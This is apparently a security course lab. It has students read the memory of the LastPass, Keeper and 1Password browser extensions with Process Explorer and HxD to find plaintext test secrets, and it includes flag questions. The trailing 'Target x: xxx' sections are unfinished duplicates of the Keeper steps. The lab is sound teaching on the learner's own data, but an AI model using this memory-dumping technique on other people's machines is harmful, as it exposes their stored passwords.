F 211: Memory Forensics of LastPass and Keeper (15 pts + 10 extra)

What You Need for This Project

Purpose

To see how the LastPass password manager handles your private data in memory.

This project just follows this excellent write-up from MDSec: Analysing LastPass, Part 1.

Installing Chrome

On your Windows machine, if you don't already have it, get Chrome here:
https://www.google.com/chrome/

Installing Process Explorer

On your Windows machine, if you don't already have it, get Process Explorer here:
https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer

Installing HxD

On your Windows machine, if you don't already have it, get HxD here:
https://mh-nexus.de/en/hxd/

Target 1: LastPass

Installing LastPass

On your Windows machine, in Chrome, go to:
https://www.lastpass.com/
Click the "Get LastPass Free" button.

Fill in the form, as shown below.

Use a disposable email address, such as YOURNAME@mailinator.com.

Click the "Sign Up-It's Free" button.

Click the "Install LastPass" button, as shown below.

Add a fake password with these values, as shown below: Click the Save button.

Finding the Process with the LastPass Extension

Launch Process Explorer. Scroll to the lower section to see user processes.

There are several Chrome processes, as shown below.

Hover the mouse over a Chrome process to see its command line.

Find the process with this switch, outlined in red in the image below:

-- extension-process

Right-click that process and click Properties.

In the Properties sheet, click the Job tab.

Find the PID (Process ID). When I did it, the PID was 2684, as shown below.

Exploring the Memory of the Process

Launch HxD.

From the menu bar, click Tools, "Open main memory...".

Find the Process ID of the process containing the LastPass extension, as shown below, and double-click it.

In HxD, click Search, Find.

Search for testuser, as shown below.

All the data from your vault is sitting here, unencrypted, in memory! Malware on your computer could steal all of it, without even requiring administrator privileges!

F 211.1: Password Label (15 pts)

The flag is the word before your unencrypted password, covered by a green rectangle in the image below.

Target 2: Keeper

Installing Firefox

If you don't already have it, install Firefox from
https://getfirefox.com

Installing Keeper

In Firefox, go to:
https://www.keepersecurity.com
At the top right, click "Try it Free".

In the Personal and Family section, click "Get Protected".

Enter a disposable email address ending in mailinator.com and click "Try it Free Now".

Create am account, log in, and go through the Quick Start process, as shown below.

Add a Secure Note to your Vault containing the string CCSF#.

Install the Browser Extension.

Leave Firefox open.

F 211.2: Finding the Process Containing Private Data (10 pts)

Launch Process Manager. Click View, "Lower Pane View", DLLs.

Click View, "Show Lower Pane".

Find the process with the module firefox@keepersecurity.com loaded, as shown below.

The flag is covered by a green rectangle in the image below.

Stealing Data from the Vault

Use HxD to examine the RAM for the process you found above, using the PID, outlined in red in the image above.

Search for the string CCSF# to see your private data, as shown below.

Target 3: 1Password

Installing 1Password

In Firefox, go to:
https://1password.com/
At the top right, click "Try 1Password Free".

Click the "Personal & Family" tab.

In the 1Password box, click "Try FREE for 14 days", as shown below.

Fill in the form, as shown below. You can't use a mailinator.com address.

Enter the verification code from your email.

Use a master password of

CCSF#masterpw
On the "Add a card" page, scroll to the bottom and click "Create account and add card later".

Download the PDF emergency kit. Close the browser tab showing the emergency kit.

Adding Data to the Vault

On the 1Password page, at the lower left, in the Personal section, click the right-arrow, as shown below.

On the Personal page, at the center top, click the plus sign, outlined in red in the image below.

Add a password containing CCSF#, as shown below.

At the top right, click the Save button.

Installing the Firefox Extension

In Firefox, go to:
https://addons.mozilla.org/en-US/firefox/addon/1password-x-password-manager/
Click "Add to Firefo".

Click Add.

At the top right of your browser window, click the tiny circle-1 icon, outlined in red in the image below.

Sign in. You see a message saying "1Password is ready to go!", as shown below.

F 211.3: Finding the Process Containing Private Data (10 pts)

Launch Process Manager. Click View, "Lower Pane View", DLLs.

Click View, "Show Lower Pane".

Find the process with the module with a name starting with formautofill loaded, as shown below.

The flag is covered by a green rectangle in the image below.

Stealing Data from the Vault

Use HxD to examine the RAM for the process you found above, using the PID, outlined in red in the image above.

Search for the string CCSF# to see your private data, as shown below.

Target x: xxx

Installing xxx

In Firefox, go to:
https://www.keepersecurity.com
At the top right, click "Try it Free".

In the Personal and Family section, click "Get Protected".

Enter a disposable email address ending in mailinator.com and click "Try it Free Now".

Create am account, log in, and go through the Quick Start process, as shown below.

Add a Secure Note to your Vault containing the string CCSF#.

Install the Browser Extension.

Leave Firefox open.

F 211.x: Finding the Process Containing Private Data (10 pts)

Launch Process Manager. Click View, "Lower Pane View", DLLs.

Click View, "Show Lower Pane".

Find the process with the module firefox@keepersecurity.com loaded, as shown below.

The flag is covered by a green rectangle in the image below.

Stealing Data from the Vault

Use HxD to examine the RAM for the process you found above, using the PID, outlined in red in the image above.

Search for the string CCSF# to see your private data, as shown below.

Target x: xxx

Installing xxx

In Firefox, go to:
https://www.keepersecurity.com
At the top right, click "Try it Free".

In the Personal and Family section, click "Get Protected".

Enter a disposable email address ending in mailinator.com and click "Try it Free Now".

Create am account, log in, and go through the Quick Start process, as shown below.

Add a Secure Note to your Vault containing the string CCSF#.

Install the Browser Extension.

Leave Firefox open.

F 211.x: Finding the Process Containing Private Data (10 pts)

Launch Process Manager. Click View, "Lower Pane View", DLLs.

Click View, "Show Lower Pane".

Find the process with the module firefox@keepersecurity.com loaded, as shown below.

The flag is covered by a green rectangle in the image below.

Stealing Data from the Vault

Use HxD to examine the RAM for the process you found above, using the PID, outlined in red in the image above.

Search for the string CCSF# to see your private data, as shown below.

References

Analysing LastPass, Part 1

Posted 10-23-2021
Keeper added 11-3-22
Lastpass link fixed 11-29-22